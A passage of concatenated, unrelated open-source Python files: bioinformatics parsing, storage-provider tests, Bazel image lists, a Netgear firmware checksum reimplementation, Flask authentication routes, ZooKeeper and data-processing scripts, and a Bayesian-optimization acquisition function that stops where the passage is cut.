#!/usr/bin/env python import os import os.path as op import sys import argparse if __name__ == "__main__": parser = argparse.ArgumentParser( description = 'parse interproscan output' ) parser.add_argument( 'fi', help = 'input file' ) parser.add_argument( 'fo', help = 'output file (tsv)' ) args = parser.parse_args() (fi, fo) = (args.fi, args.fo) dic = dict() fhi = open(fi, "r") for line in fhi: ps = line.strip().split("\t") aid, md5, plen, aly, sname, sdesc, beg, end, score, status, date = ps[0:11] iid = ps[11] if len(ps) >= 12 else '' gid = ps[13] if len(ps) >= 14 else '' if not aid in dic: dic[aid] = [set(), set()] iids = iid.split(",") for iid in iids: if iid: dic[aid][0].add(iid) gids = gid.split("|") for gid in gids: if gid: dic[aid][1].add(gid) fhi.close() fho = open(fo, "w") for aid, lst in dic.items(): iids, gids = lst fho.write("%s\t%s\n" % (aid, ";".join(gids))) fho.close()
1,143
tests/providers/owncloud/test_provider.py
alexschiller/waterbutler
0
2167556
import pytest import io from http import client import aiohttpretty from waterbutler.core import streams from waterbutler.core import exceptions from waterbutler.core.path import WaterButlerPath from waterbutler.providers.owncloud import OwnCloudProvider from waterbutler.providers.owncloud.metadata import OwnCloudFileMetadata from waterbutler.providers.owncloud.metadata import OwnCloudFolderMetadata @pytest.fixture def auth(): return { 'name': 'cat', 'email': '<EMAIL>', } @pytest.fixture def credentials(): return {'username':'cat', 'password':'<PASSWORD>', 'host':'https://cat/owncloud'} @pytest.fixture def settings(): return {'folder': '/my_folder', 'verify_ssl':False} @pytest.fixture def provider(auth, credentials, settings): return OwnCloudProvider(auth, credentials, settings) @pytest.fixture def folder_list(): return b'''<?xml version="1.0" ?> <d:multistatus xmlns:d="DAV:" xmlns:oc="http://owncloud.org/ns" xmlns:s="http://sabredav.org/ns"> <d:response> <d:href>/owncloud/remote.php/webdav/</d:href> <d:propstat> <d:prop> <d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified> <d:resourcetype> <d:collection/> </d:resourcetype> <d:quota-used-bytes>714783</d:quota-used-bytes> <d:quota-available-bytes>-3</d:quota-available-bytes> <d:getetag>&quot;57688dd358fb7&quot;</d:getetag> </d:prop> <d:status>HTTP/1.1 200 OK</d:status> </d:propstat> </d:response> <d:response> <d:href>/owncloud/remote.php/webdav/Documents/</d:href> <d:propstat> <d:prop> <d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified> <d:resourcetype> <d:collection/> </d:resourcetype> <d:quota-used-bytes>36227</d:quota-used-bytes> <d:quota-available-bytes>-3</d:quota-available-bytes> <d:getetag>&quot;57688dd3584b0&quot;</d:getetag> </d:prop> <d:status>HTTP/1.1 200 OK</d:status> </d:propstat> </d:response> <d:response> <d:href>/owncloud/remote.php/webdav/Photos/</d:href> <d:propstat> <d:prop> <d:getlastmodified>Wed, 15 Jun 2016 22:49:40 GMT</d:getlastmodified> <d:resourcetype> <d:collection/> </d:resourcetype> <d:quota-used-bytes>678556</d:quota-used-bytes> <d:quota-available-bytes>-3</d:quota-available-bytes> <d:getetag>&quot;5761db8485325&quot;</d:getetag> </d:prop> <d:status>HTTP/1.1 200 OK</d:status> </d:propstat> </d:response> </d:multistatus>''' @pytest.fixture def folder_metadata(): return b'''<?xml version="1.0" ?> <d:multistatus xmlns:d="DAV:" xmlns:oc="http://owncloud.org/ns" xmlns:s="http://sabredav.org/ns"> <d:response> <d:href>/owncloud/remote.php/webdav/Documents/</d:href> <d:propstat> <d:prop> <d:getlastmodified>Tue, 21 Jun 2016 00:44:03 GMT</d:getlastmodified> <d:resourcetype> <d:collection/> </d:resourcetype> <d:quota-used-bytes>36227</d:quota-used-bytes> <d:quota-available-bytes>-3</d:quota-available-bytes> <d:getetag>&quot;57688dd3584b0&quot;</d:getetag> </d:prop> <d:status>HTTP/1.1 200 OK</d:status> </d:propstat> </d:response> </d:multistatus>''' @pytest.fixture def file_metadata(): return b'''<?xml version="1.0"?> <d:multistatus xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns" xmlns:oc="http://owncloud.org/ns"> <d:response> <d:href>/owncloud/remote.php/webdav/Documents/dissertation.aux</d:href> <d:propstat> <d:prop> <d:getlastmodified>Sun, 10 Jul 2016 23:28:31 GMT</d:getlastmodified> <d:getcontentlength>3011</d:getcontentlength> <d:resourcetype/> <d:getetag>&quot;a3c411808d58977a9ecd7485b5b7958e&quot;</d:getetag> <d:getcontenttype>application/octet-stream</d:getcontenttype> </d:prop> <d:status>HTTP/1.1 200 OK</d:status> </d:propstat> </d:response> </d:multistatus>''' @pytest.fixture def file_content(): return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS' @pytest.fixture def file_like(file_content): return io.BytesIO(file_content) @pytest.fixture def file_stream(file_like): return streams.FileStreamReader(file_like) class TestValidatePath: @pytest.mark.asyncio @pytest.mark.aiohttpretty async def test_validate_v1_path_file(self, provider, file_metadata): path = WaterButlerPath('/triangles.txt', prepend=provider.folder) url = provider._webdav_url_ + path.full_path aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207) try: wb_path_v1 = await provider.validate_v1_path('/triangles.txt') except Exception as exc: pytest.fail(str(exc)) wb_path_v0 = await provider.validate_path('/triangles.txt') assert wb_path_v1 == wb_path_v0 @pytest.mark.asyncio @pytest.mark.aiohttpretty async def test_validate_v1_path_folder(self, provider, folder_metadata): path = WaterButlerPath('/myfolder/', prepend=provider.folder) url = provider._webdav_url_ + path.full_path aiohttpretty.register_uri('PROPFIND', url, body=folder_metadata, auto_length=True, status=207) try: wb_path_v1 = await provider.validate_v1_path('/myfolder/') except Exception as exc: pytest.fail(str(exc)) wb_path_v0 = await provider.validate_path('/myfolder/') assert wb_path_v1 == wb_path_v0 class TestCRUD: @pytest.mark.asyncio @pytest.mark.aiohttpretty async def test_download(self, provider, file_metadata, file_like): path = WaterButlerPath('/triangles.txt', prepend=provider.folder) url = provider._webdav_url_ + path.full_path aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207) aiohttpretty.register_uri('GET', url, body=b'squares', auto_length=True, status=200) result = await provider.download(path) content = await result.response.read() assert content == b'squares' @pytest.mark.asyncio @pytest.mark.aiohttpretty async def test_upload(self, provider, file_stream, file_metadata): path = WaterButlerPath('/phile', prepend=provider.folder) url = provider._webdav_url_ + path.full_path aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207) aiohttpretty.register_uri('PUT', url, body=b'squares', auto_length=True, status=201) metadata, created = await provider.upload(file_stream, path) expected = OwnCloudFileMetadata('dissertation.aux','/owncloud/remote.php/webdav/Documents/phile', {'{DAV:}getetag':'&quot;a3c411808d58977a9ecd7485b5b7958e&quot;', '{DAV:}getlastmodified':'Sun, 10 Jul 2016 23:28:31 GMT', '{DAV:}getcontentlength':3011}) assert created is True assert metadata.name == expected.name assert metadata.size == expected.size assert aiohttpretty.has_call(method='PUT', uri=url) @pytest.mark.asyncio @pytest.mark.aiohttpretty async def test_delete(self, provider, file_metadata): path = WaterButlerPath('/phile', prepend=provider.folder) url = provider._webdav_url_ + path.full_path aiohttpretty.register_uri('PROPFIND', url, body=file_metadata, auto_length=True, status=207) path = await provider.validate_path('/phile') url = provider._webdav_url_ + path.full_path aiohttpretty.register_uri('DELETE', url, status=204) await provider.delete(path) class TestMetadata: @pytest.mark.asyncio @pytest.mark.aiohttpretty async def test_metadata(self, provider, folder_list): path = WaterButlerPath('/', prepend=provider.folder) url = provider._webdav_url_ + path.full_path aiohttpretty.register_uri('PROPFIND', url, body=folder_list, auto_length=True, status=207) path = await provider.validate_path('/') url = provider._webdav_url_ + path.full_path aiohttpretty.register_uri('PROPFIND', url, body=folder_list, status=207) result = await provider.metadata(path) assert isinstance(result, list) assert len(result) == 2 assert result[0].kind == 'folder' assert result[0].name == 'Documents' class TestOperations: async def test_can_intra_copy(self, provider): assert provider.can_intra_copy(provider) async def test_can_intra_move(self, provider): assert provider.can_intra_move(provider)
9,542
src/main/docker/images.bzl
VideoAmp/cross-media-measurement
4
2170592
# Copyright 2020 The Cross-Media Measurement Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Container image specs.""" load("//build:variables.bzl", "IMAGE_REPOSITORY_SETTINGS") _PREFIX = IMAGE_REPOSITORY_SETTINGS.repository_prefix # List of specs for all Docker containers to push to a container registry. # These are common to both local execution (e.g. in Kind) as well as on GKE. COMMON_IMAGES = [ struct( name = "duchy_async_computation_control_server_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:async_computation_control_server_image", repository = _PREFIX + "/duchy/async-computation-control", ), struct( name = "duchy_herald_daemon_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/daemon/herald:herald_daemon_image", repository = _PREFIX + "/duchy/herald", ), struct( name = "duchy_liquid_legions_v2_mill_daemon_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/daemon/mill/liquidlegionsv2:gcs_liquid_legions_v2_mill_daemon_image", repository = _PREFIX + "/duchy/liquid-legions-v2-mill", ), struct( name = "duchy_publisher_data_server_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:publisher_data_server_image", repository = _PREFIX + "/duchy/publisher-data", ), struct( name = "duchy_spanner_computations_server_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:spanner_computations_server_image", repository = _PREFIX + "/duchy/spanner-computations", ), struct( name = "kingdom_global_computation_server_image", image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:global_computation_server_image", repository = _PREFIX + "/kingdom/global-computation", ), struct( name = "kingdom_requisition_server_image", image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:requisition_server_image", repository = _PREFIX + "/kingdom/requisition", ), struct( name = "kingdom_system_requisition_server_image", image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/common/server:system_requisition_server_image", repository = _PREFIX + "/kingdom/system-requisition", ), struct( name = "kingdom_data_server_image", image = "//src/main/kotlin/org/wfanet/measurement/kingdom/deploy/gcloud/server:gcp_kingdom_data_server_image", repository = _PREFIX + "/kingdom/data-server", ), struct( name = "setup_spanner_schema_image", image = "//src/main/kotlin/org/wfanet/measurement/tools:push_spanner_schema_image", repository = _PREFIX + "/setup/push-spanner-schema", ), ] # List of specs for all Docker containers to push to a container registry. # These are only used on GKE. GKE_IMAGES = [ struct( name = "duchy_computation_control_server_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:gcs_computation_control_server_image", repository = _PREFIX + "/duchy/computation-control", ), struct( name = "duchy_metric_values_server_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:gcp_server_image", repository = _PREFIX + "/duchy/metric-values", ), ] # List of image build rules that are only used locally (e.g. in Kind). LOCAL_IMAGES = [ struct( name = "forwarded_storage_liquid_legions_v2_mill_daemon_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/daemon/mill/liquidlegionsv2:forwarded_storage_liquid_legions_v2_mill_daemon_image", ), struct( name = "forwarded_storage_computation_control_server_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/common/server:forwarded_storage_computation_control_server_image", ), struct( name = "spanner_forwarded_storage_server_image", image = "//src/main/kotlin/org/wfanet/measurement/duchy/deploy/gcloud/server:spanner_forwarded_storage_server_image", ), struct( name = "fake_storage_server_image", image = "//src/main/kotlin/org/wfanet/measurement/storage/filesystem:server_image", ), ] ALL_GKE_IMAGES = COMMON_IMAGES + GKE_IMAGES ALL_LOCAL_IMAGES = COMMON_IMAGES + LOCAL_IMAGES
5,058
part_7/firmware_building/checksums/libacos.py
zcutlip/broken_abandoned
28
2168436
#!/usr/bin/env python import sys """ reimplementation of calculate_checksum() from netgear libacos_shared.so binary MD5: 660c1e24aa32c4e096541e6147c8b56e libacos_shared.so """ class LibAcosChecksum(object): def __init__(self,data,data_len,checksum_offset=-1): self.dword_623A0=0 self.dword_623A4=0 fake_checksum="\x00\x00\x00\x00" self.data=data[0:data_len] if(checksum_offset > -1): self.data=(self.data[0:checksum_offset]+ fake_checksum+ self.data[checksum_offset+len(fake_checksum):]) self._update(self.data[0:data_len]) self._finalize() def _update(self,data): size=len(data) t0=self.dword_623A0 a0=self.dword_623A4 a2=size a3=0 while a3 != a2: v1=ord(data[a3]) a3+=1 a0=(a0+v1) & 0xffffffff t0=(t0+a0) & 0xffffffff self.dword_623A0=t0 self.dword_623A4=a0 return 1 def _finalize(self): v0=self.dword_623A0 v1=self.dword_623A4 a0=(v0 & 0xffff) v0=(v0>>16 ) v0=(v0+a0) & 0xffffffff a2=(v1 & 0xffff) v1=(v1>>16) v1=(v1+a2) & 0xffffffff a1=v0>>16 a1=(a1+v0) & 0xffffffff a0=v1>>16 a1=(a1 & 0xffff) a0=(a0+v1) & 0xffffffff a0=(a0 & 0xffff) v0=(a1<<16) & 0xffffffff a2=(v0 | a0) v0=a2 self.dword_623A4=a0 self.dword_623A0=a1 self.checksum = v0 if __name__=="__main__": firmware=sys.argv[1] size=int(sys.argv[2],0) data=open(firmware,"rb").read() if size > len(data): raise Exception("size: %d is longer than data length: %d" % (size,len(data))) checksum=LibAcosChecksum(data,size).checksum print("Checksum: 0x%08x" % checksum)
1,986
applications/piraoke/models/0.py
Querra/piraoke
0
2169806
from gluon.storage import Storage settings = Storage() settings.migrate = True settings.title = 'Piraoke' settings.subtitle = 'powered by web2py' settings.author = '<NAME>' settings.author_email = '<EMAIL>' settings.keywords = 'pi, karaoke' settings.description = 'Karaoke application for raspberry pi' settings.layout_theme = 'Default' settings.database_uri = 'sqlite://storage.sqlite' settings.security_key = '56f5254c-1be4-4abf-8a5f-132c872ac9a9' settings.email_server = 'localhost' settings.email_sender = '<EMAIL>' settings.email_login = '' settings.login_method = 'local' settings.login_config = '' settings.plugins = []
628
api/app/auth/api_routes.py
Sguerreroo/electricity-market-analysis
0
2169265
import random from flask import request, make_response from werkzeug.security import check_password_hash from flask_jwt_extended import ( jwt_required, create_access_token, jwt_refresh_token_required, create_refresh_token, get_jwt_identity, set_access_cookies, set_refresh_cookies, unset_jwt_cookies ) from . import auth_bp from .models import User from app.models import Potential_Customer_Notification from app.customer.models import Customer from app.company.models import Company from .schemas import UserSchema from app.customer.schemas import CustomerSchema from app.company.schemas import CompanySchema @auth_bp.route("/signup-customer", methods=["POST"]) def signup_customer(): if not request.is_json: return "Missing JSON in request", 400 data = request.get_json() errors = {} errors.update(validateUser(data)) errors.update(validateCustomer(data)) if errors: return errors, 422 if User.get_by_username(data['username']): return {"username": ["Nombre de usuario no disponible"]}, 422 if Customer.get_by_nif(data['nif']): return {"nif": ["Este NIF ya ha sido registrado"]}, 422 user = User(username=data['username'], user_type=1) user.set_password(data['password']) user.save() customer = Customer( nif=data['nif'].upper(), name=data['name'], surname=data['surname'], email=data['email'], user_id=user.id ) customer.save() companies = Company.get_random_companies(random.randint(20, 40)) for company in companies: p_c_n = Potential_Customer_Notification( nif=customer.nif, cif=company.cif ) p_c_n.save() return "", 200 @auth_bp.route('/signup-company', methods=["POST"]) def signup_company(): if not request.is_json: return "Missing JSON in request", 400 data = request.get_json() errors = {} errors.update(validateUser(data)) errors.update(validateCompany(data)) if errors: return errors, 422 if User.get_by_username(data['username']): return {"username": ["Nombre de usuario no disponible"]}, 422 if Company.get_by_cif(data['cif']): return {"cif": ["Este CIF ya ha sido registrado"]}, 422 user = User(username=data['username'], user_type=0) user.set_password(data['password']) user.save() company = Company( cif=data['cif'].upper(), name=data['name'], address=data['address'], url=data['url'], email=data['email'], company_type=data['companytype'], phone=data['phone'], user_id=user.id ) company.save() return "", 200 @auth_bp.route("/login", methods=["POST"]) def login(): if not request.is_json: return "Missing JSON in request", 400 data = request.get_json() username = data['username'] password = data['password'] user = User.get_by_username(username) if user and user.check_password(password): access_token = create_access_token(identity=username) refresh_token = create_refresh_token(identity=username) result_response = { "login": True, "user_type": user.user_type } if user.user_type == 0: company = Company.get_by_user_id(user.id) result_response["company_type"] = company.company_type response = make_response(result_response) set_access_cookies(response, access_token) set_refresh_cookies(response, refresh_token) return response, 200 return "User or password incorrect", 400 @auth_bp.route('/logout', methods=["POST"]) def logout(): resp = make_response({'logout': True}) unset_jwt_cookies(resp) return resp, 200 def validateUser(data): user = { "username": data["username"], "password": data["password"], "passwordconfirmation": data["passwordconfirmation"] } user = {k: v for k, v in user.items() if v} return UserSchema().validate(user) def validateCustomer(data): customer = { "nif": data["nif"], "name": data["name"], "surname": data["surname"], "email": data["email"], } customer = {k: v for k, v in customer.items() if v} return CustomerSchema().validate(customer) def validateCompany(data): company = { "name": data["name"], "cif": data["cif"], "url": data["url"], "email": data["email"], "phone": data["phone"], } company = {k: v for k, v in company.items() if v} return CompanySchema().validate(company)
4,128
fediverse/views/renderer/activity/Create.py
YuzuRyo61/CrossPlan
8
2169592
from django.conf import settings from django.shortcuts import get_object_or_404 from django.urls import reverse from fediverse.models import User def RenderCreate(uuid, actor, obj): target = User.objects.get(username__iexact=actor) return { "id": f"https://{settings.CP_ENDPOINT}{reverse('Fediverse:PostActivity', kwargs={'uuid': str(uuid)})}", "type": "Create", "actor": f"https://{settings.CP_ENDPOINT}{reverse('UserShow', kwargs={'username': target.username})}", "object": obj }
528
utils/src/utils/time_data.py
RoboHubEindhoven/suii_control
0
2170855
import yaml class Time(yaml.YAMLObject): yaml_loader = yaml.SafeLoader yaml_tag = u'!Time' def __init__(self, secs , nsecs): self.secs = secs self.nsecs = nsecs
191
dl_wl_imgs.py
HenriTEL/wedding
0
2170100
#!/usr/bin/env python3 """Download images provided in wedding-list.csv""" import csv import subprocess WEDDING_LIST_IMG_DIR = "static/img/wedding-list/" WEDDING_LIST_CSV = "backend/db/wedding-list.csv" with open(WEDDING_LIST_CSV) as csvfile: reader = csv.reader(csvfile, quotechar='"') next(reader) images_urls = {row[3] for row in reader} cmd = ['wget', '--no-clobber', '-P', WEDDING_LIST_IMG_DIR] + list(images_urls) subprocess.run(cmd)
454
zookeeper/kazoo-update.py
li-ma/homework
0
2170629
import time from kazoo.client import KazooClient from kazoo.client import KazooState import logging logging.basicConfig() def my_listener(state): if state == KazooState.LOST: # Register somewhere that the session was lost print 'The session is lost: %s' % str(state) elif state == KazooState.SUSPENDED: # Handle being disconnected from Zookeeper print 'The session is suspended: %s' % str(state) else: # Handle being connected/reconnected to Zookeeper print 'The session is reconnected: %s' % str(state) zk = KazooClient(hosts='127.0.0.1:2181') zk.start() zk.add_listener(my_listener) # Ensure a path, create if necessary zk.ensure_path("/dragonflow/table1") # Determine if a node exists if zk.exists("/dragonflow/table1/key1"): # Do transaction transaction = zk.transaction() transaction.create('/dragonflow/table1/key9', b"value9") transaction.set_data('/dragonflow/table1/key1', b"value8") results = transaction.commit() print(results) result = zk.get('/dragonflow/table1/key8') print result[0]
1,079
cyberpunk/cyberpunk_endpoint.py
jonaylor89/cyberpunk
5
2170410
import logging from dataclasses import dataclass from typing import Any, Dict, List, Optional, Type from cyberpunk.transformations import TransformationInput from cyberpunk.transformations.concat import ConcatInput from cyberpunk.transformations.fade_in import FadeInInput from cyberpunk.transformations.fade_out import FadeOutInput from cyberpunk.transformations.repeat import RepeatInput from cyberpunk.transformations.reverse import ReverseInput from cyberpunk.transformations.slice import SliceInput @dataclass class CyberpunkEndpoint: """ { "audio": "celtic_pt2.mp3", "hash": "=", "reverse": true, "repeat": 1, "slice": { "start": 1000, "end": 5000, } } """ # path: str audio: str hash: str = "unsafe" format: str = "mp3" reverse: Optional[ReverseInput] = None repeat: Optional[RepeatInput] = None slice: Optional[SliceInput] = None fade_in: Optional[FadeInInput] = None fade_out: Optional[FadeOutInput] = None concat: Optional[ConcatInput] = None @classmethod def from_req(cls, key: str, args: Dict): endpoint = cls(audio=key, hash="unsafe") lookup_table: Dict[str, Type[TransformationInput]] = { "reverse": ReverseInput, "repeat": RepeatInput, "slice": SliceInput, "concat": ConcatInput, "fade_in": FadeInInput, "fade_out": FadeOutInput, } supported_formats: List[str] = [ "mp3", "wav", "flac", ] # Parse request args and fill corresponding fields for (k, v) in args.items(): if k in lookup_table.keys(): logging.info(f"parsing transformation input: {k}") parser: Type[TransformationInput] = lookup_table[k] try: inputs: Dict[str, Any] = parser.from_str(v) except Exception as e: logging.error( f"failure to parse input `{v}` for `{k}` : {e}", ) continue # This only works because attributes are the same name # as the query parameters. If that stops being the case, # another map/lookup-table will need to be used # i.e. setattr(endpoint, param_to_attr[k], inputs) setattr(endpoint, k, inputs) # default formatting is mp3 file_format = ( args["format"] if "format" in args.keys() and args["format"] in supported_formats else "mp3" ) endpoint.format = file_format return endpoint def __repr__(self) -> str: params = [] if self.reverse is not None: params.append(f"reverse={self.reverse}") if self.repeat is not None: params.append(f"repeat={self.repeat}") if self.slice is not None: params.append(f"slice={self.slice}") if self.concat is not None: params.append(f"concat={self.concat}") if self.fade_in is not None: params.append(f"fade_in={self.fade_in}") if self.fade_out is not None: params.append(f"fade_out={self.fade_out}") return f"/{self.audio}{('?' + '&'.join(params)) if len(params) > 0 else ''}" def __str__(self) -> str: params = [] if self.reverse is not None: params.append(f"reverse={self.reverse}") if self.repeat is not None: params.append(f"repeat={self.repeat}") if self.slice is not None: params.append(f"slice={self.slice}") if self.concat is not None: params.append(f"concat={self.concat}") if self.fade_in is not None: params.append(f"fade_in={self.fade_in}") if self.fade_out is not None: params.append(f"fade_out={self.fade_out}") return f"/{self.audio}{('?' + '&'.join(params)) if len(params) > 0 else ''}"
4,076
process/network/find_verified_user.py
LiuQL2/twitter
1
2168992
#!/usr/bin/python env # -*- coding: utf-8 -*- import json import csv import os import numpy as np import time import pandas as pd from collections import OrderedDict from utility.functions import get_dirlist from utility.functions import write_log def find_user(path_data,path_save_to,file_save_to): file_name_list = get_dirlist(path = path_data, key_word_list=['part-r','.json','<KEY>'],no_key_word_list=['crc']) print len(file_name_list) time.sleep(40) file_save = open(path_save_to + file_save_to,'wb') file_writer = csv.writer(file_save) print file_name_list file_index = 0 for file_name in file_name_list: file_index = file_index + 1 file = open(path_data + file_name, 'r') write_log(log_file_name='find_verified_user.log',log_file_path=os.getcwd(),information='file index:' + str(file_index) + ' is being processing.') for line in file: try: print len(line) row = json.loads(line,object_pairs_hook=OrderedDict) actor = [row['actor']['id'], row['actor']['verified'], row['actor']['preferredUsername']] file_writer.writerow(actor) print 'file index:', file_index, actor if row['type'] == 'retweet': origin_actor = [row['originActor']['id'], row['originActor']['verified'], row['originActor']['preferredUsername']] file_writer.writerow(origin_actor) else: pass except: print file_index, '*' * 100 pass file.close() file_save.close() def drop_duplicate_user(path_data,path_save_to, actor_file,all_user_file,verified_user_file): user_dataFrame = pd.read_csv(path_data + actor_file,names = ['user_id','isverified','preferred_username'],dtype={'user_id':np.str},header=None) user_dataFrame = user_dataFrame.drop_duplicates() user_verified_dataFrame = user_dataFrame[user_dataFrame.isverified == True] user_dataFrame.to_csv(path_save_to + all_user_file,index = False,header=False) user_verified_dataFrame.to_csv(path_save_to + verified_user_file,index=False,header=False) print 'all user:\n',user_dataFrame print 'verified user:\n',user_verified_dataFrame def main(): write_log(log_file_name='find_verified_user.log', log_file_path=os.getcwd(), information='###################program start#####################.') path_data = 'D:/LiuQL/eHealth/twitter/data/data_origin/' path_save_to = 'D:/LiuQL/eHealth/twitter/data/data_origin/' # path_data = '/pegasus/twitter-p-or-t-uae-201603.json.dxb/' # path_save_to ='/pegasus/harir/Qianlong/data/network/' duplicate_user_file = 'user_contain_duplicates.txt' all_user_file = 'user_all.txt' verified_user_file = 'user_verified.txt' find_user(path_data = path_data, path_save_to = path_save_to,file_save_to=duplicate_user_file) drop_duplicate_user(path_data = path_save_to, path_save_to = path_save_to, actor_file=duplicate_user_file,all_user_file=all_user_file,verified_user_file=verified_user_file) write_log(log_file_name='find_verified_user.log', log_file_path=os.getcwd(), information='###################program finished#####################.' + '\n' * 5) main()
3,318
migrations/versions/7263a24da5fd_.py
originaltebas/chmembers
0
2170892
"""empty message Revision ID: 7263a24da5fd Revises: <KEY> Create Date: 2019-06-06 16:11:22.957093 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import mysql # revision identifiers, used by Alembic. revision = '7263a24da5fd' down_revision = '<KEY>' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.alter_column('miembros', 'hoja_firmada', existing_type=mysql.TINYINT(display_width=1), type_=sa.Boolean(), existing_nullable=True) op.add_column('reuniones', sa.Column('comentarios_culto', sa.String(length=100), nullable=True)) op.drop_column('reuniones', 'comentarios') # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.add_column('reuniones', sa.Column('comentarios', mysql.VARCHAR(length=100), nullable=True)) op.drop_column('reuniones', 'comentarios_culto') op.alter_column('miembros', 'hoja_firmada', existing_type=sa.Boolean(), type_=mysql.TINYINT(display_width=1), existing_nullable=True) # ### end Alembic commands ###
1,224
enbo/util/two_step_ei_envelope.py
shalijiang/bo
3
2169905
import torch from botorch.models.model import Model from botorch.acquisition.analytic import ( ExpectedImprovement, AnalyticAcquisitionFunction, ) from botorch.acquisition.monte_carlo import qExpectedImprovement from torch import Tensor from botorch.optim import optimize_acqf from botorch.optim.initializers import gen_batch_initial_conditions from botorch.gen import gen_candidates_torch from botorch.sampling.samplers import ( MCSampler, GaussHermiteSampler, SobolQMCNormalSampler, ) from typing import Union, Optional, Dict from botorch.utils.transforms import t_batch_mode_transform from botorch.acquisition import ScalarizedObjective from botorch.acquisition.two_step_ei import qExpectedImprovementBatch from botorch import settings from botorch.utils.sampling import draw_sobol_samples class TwoStepEIEnvelope(AnalyticAcquisitionFunction): def __init__( self, model: Model, best_f: Union[float, Tensor], bounds: Tensor, sampler: Optional[MCSampler] = None, inner_sampler: Optional[MCSampler] = None, q1: Optional[int] = 1, options: Optional[Dict[str, Union[bool, float, int, str]]] = {}, objective: Optional[ScalarizedObjective] = None, maximize: bool = True, ) -> None: r"""Two-step Expected Improvement based on: Wu & Frazier, Practical Two-Step Lookahead Bayesian Optimization, NeurIPS 2019. Args: model: A fitted single-outcome model. best_f: Either a scalar or a `b`-dim Tensor (batch mode) representing the best function value observed so far (assumed noiseless). bounds: a 2 x d tensor specifying the range of each dimension sampler: used to sample y from its posterior q1: int, batch size of the second step objective: A ScalarizedObjective (optional). maximize: If True, consider the problem a maximization problem. """ super().__init__(model=model, objective=objective) self.maximize = maximize if not torch.is_tensor(best_f): best_f = torch.tensor(best_f) self.register_buffer("best_f", best_f) self.bounds = bounds self.sampler = sampler self.inner_sampler = inner_sampler or SobolQMCNormalSampler(num_samples=512) self.q1 = q1 self.options = options @t_batch_mode_transform(expected_q=1) def forward(self, X: Tensor) -> Tensor: r"""Evaluate Two-Step EI on the candidate set X. Args: X: A `b1 x ... bk x 1 x d`-dim batched tensor of `d`-dim design points. Expected Improvement is computed for each point individually, i.e., what is considered are the marginal posteriors, not the joint. Returns: A `b1 x ... bk`-dim tensor of Expected Improvement values at the given design points `X`. """ acq_func = ExpectedImprovement(model=self.model, best_f=self.best_f) immediate_utility = acq_func(X) if self.q1 == 0: return immediate_utility if X.dim() < 3: X = X.unsqueeze(0) batch_size, q, d = X.shape fantasy_model = self.model.fantasize( X=X, sampler=self.sampler, observation_noise=True ) best_f = fantasy_model.train_targets.max(dim=-1)[0] # assume _sample_shape=torch.Size([num_samples]) num_fantasies = self.sampler.sample_shape[0] with torch.enable_grad(): if self.q1 == 1: # two-step, use analytic EI value_function = ExpectedImprovement(model=fantasy_model, best_f=best_f) else: value_function = qExpectedImprovement( model=fantasy_model, sampler=self.inner_sampler, best_f=best_f ) def joint_value_function(X): # X reshape to batch_shape x fantasies x batch_size x q x d batch_size_joint = X.shape[0] X_prime = X.view( batch_size_joint, num_fantasies, batch_size, self.q1, d ) # values: batch_size_joint x num_fantasies x batch_size values = value_function(X_prime) return values.sum(tuple(range(1, len(values.shape)))) joint_optim_size = num_fantasies * batch_size * self.q1 # can tune num_restarts, raw_samples, and maxiter to tradeoff efficiency and accuracy num_restarts = 20 seed = self.options.get("seed", 0) method = self.options.get("method", "scipy") if method == "scipy": # by default L-BFGS-B is used num_batches = self.options.get("num_batches", 5) X_fantasies, _ = optimize_acqf( acq_function=joint_value_function, bounds=self.bounds, q=joint_optim_size, num_restarts=num_restarts, raw_samples=512, options={ "maxiter": 500, "seed": seed, "batch_limit": round(num_restarts / num_batches), }, ) elif method == "torch" or method == "sgd": # by default Adam is used bounds = self.bounds Xinit = gen_batch_initial_conditions( acq_function=joint_value_function, bounds=bounds, q=joint_optim_size, num_restarts=50, raw_samples=1000, options={ "nonnegative": True, "seed": self.options.get("seed", None), }, ) # Xinit = draw_sobol_samples(bounds=bounds, n=100, q=joint_optim_size, seed=self.options.get("seed", None)) optimizer = torch.optim.SGD if method == "sgd" else torch.optim.Adam batch_candidates, batch_acq_values = gen_candidates_torch( initial_conditions=Xinit, acquisition_function=joint_value_function, lower_bounds=bounds[0], upper_bounds=bounds[1], optimizer=optimizer, options={ "maxiter": 500, "lr": 1.0, "scheduler_on": True, "gamma": 0.7, }, # options={"maxiter": 300}, verbose=False, ) best = torch.argmax(batch_acq_values.view(-1), dim=0) X_fantasies = batch_candidates[best].detach() X_fantasies = X_fantasies.view(num_fantasies, batch_size, self.q1, d) with settings.propagate_grads(True): values = value_function(X_fantasies) if isinstance(self.sampler, GaussHermiteSampler): weighted_values = values * self.sampler.base_weights future_utility = 